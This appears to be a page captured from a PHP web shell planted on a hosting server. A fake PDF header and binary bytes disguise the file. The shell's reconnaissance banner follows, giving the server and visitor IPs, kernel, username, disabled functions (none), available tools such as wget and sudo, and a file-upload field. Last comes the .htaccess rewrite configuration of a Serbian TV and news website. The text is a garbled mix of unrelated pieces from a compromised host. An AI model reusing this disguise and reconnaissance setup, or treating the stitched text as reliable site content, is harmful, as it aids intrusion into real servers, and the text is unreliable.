%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 188.40.95.74 / Your IP : 216.73.216.124 Web Server : Apache System : Linux cp01.striminghost.net 3.10.0-1160.119.1.el7.tuxcare.els13.x86_64 #1 SMP Fri Nov 22 06:29:45 UTC 2024 x86_64 User : vlasotin ( 1054) PHP Version : 5.6.40 Disable Function : NONE MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/vlasotin/www/ |
Upload File : |
# # Copyright (c) 2020, airmedia.rs - Igor Stefanovic # www.vlasotince.tv # RewriteEngine on RewriteRule ^moj-admin/$ moj-admin/index.php [L] RewriteRule ^naslovna/?$ index.php?strana=naslovna [L] RewriteRule ^radio-gaga/?$ page.php?strana=radio-gaga [L] RewriteRule ^tv/?$ page.php?strana=tv [L] RewriteRule ^video/?$ page.php?strana=video [L] RewriteRule ^video/strana/([0-9]+)/?$ page.php?strana=video&page=$1 [L] RewriteRule ^bilbordi/?$ page.php?strana=bilbordi [L] RewriteRule ^marketing/?$ page.php?strana=marketing [L] RewriteRule ^kontakt/?$ page.php?strana=kontakt [L] RewriteRule ^tv/tv-uzivo/?$ page.php?strana=tv-uzivo [L] RewriteRule ^vesti/?$ page.php?strana=vesti [L] RewriteRule ^vesti/strana/([0-9]+)/?$ page.php?strana=vesti&page=$1 [L] RewriteRule ^vesti/([^/\.]+)/?$ page.php?strana=vesti&kategorija=$1 [L] RewriteRule ^vesti/([^/\.]+)/strana/([0-9]+)/?$ page.php?strana=vesti&kategorija=$1&page=$2 [L] RewriteRule ^vesti/datum/([^/\.]+)/?$ page.php?strana=vesti&datum=$1 [L] RewriteRule ^vesti/datum/([^/\.]+)/strana/([0-9]+)/?$ page.php?strana=vesti&datum=$1&page=$2 [L] RewriteRule ^vest/([0-9]+)/?$ vest.php?id=$1 [L] RewriteRule ^vest/([0-9]+)/([^/\.]+)/?$ vest.php?id=$1&seo=$2 [L] RewriteRule ^uploads/(.*)/(.*)/(.*)/?$ timthumb.php?src=http://www.vestidana.rs/uploads/$3&w=$1&h=$2 RewriteRule ^uploads/(.*)/(.*)/?$ timthumb.php?src=http://www.vestidana.rs/uploads/$2&w=$1 #greska ErrorDocument 404 /index.php?strana=404 <Files 403.shtml> order allow,deny allow from all </Files> # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php56” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php56 .php .php5 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit